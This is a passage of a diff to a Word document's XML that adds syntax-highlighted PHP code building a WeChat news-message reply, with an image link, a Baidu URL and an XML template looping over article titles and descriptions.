+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'http://barretren.applinzi.com/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>WeixinProject/img/huge.jpeg'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'Url'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'http://www.baidu.com'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$template</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"&lt;xml&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;ToUserName&gt;&lt;![CDATA["</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$toUser</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"]]&gt;&lt;/ToUserName&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;FromUserName&gt;&lt;![CDATA["</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$fromUser</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"]]&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>&lt;/FromUserName&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>&lt;CreateTime&gt;"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$time</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"&lt;/CreateTime&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;MsgType&gt;&lt;![CDATA[news]]&gt;&lt;/MsgType&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;ArticleCount&gt;"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="BC5A65"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>count</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$arr</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>).</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"&lt;/ArticleCount&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;Articles&gt;"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -19166,8 +19398,950 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:b/>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">foreach </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$arr </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">as </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$value</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$template</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"&lt;item&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;Title&gt;&lt;![CDATA["</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$value</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'title'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>].</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"]]&gt;&lt;/Title&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;Description&gt;&lt;![CDATA["</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$value</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'description'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>].</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"]]&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>&lt;/Description&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
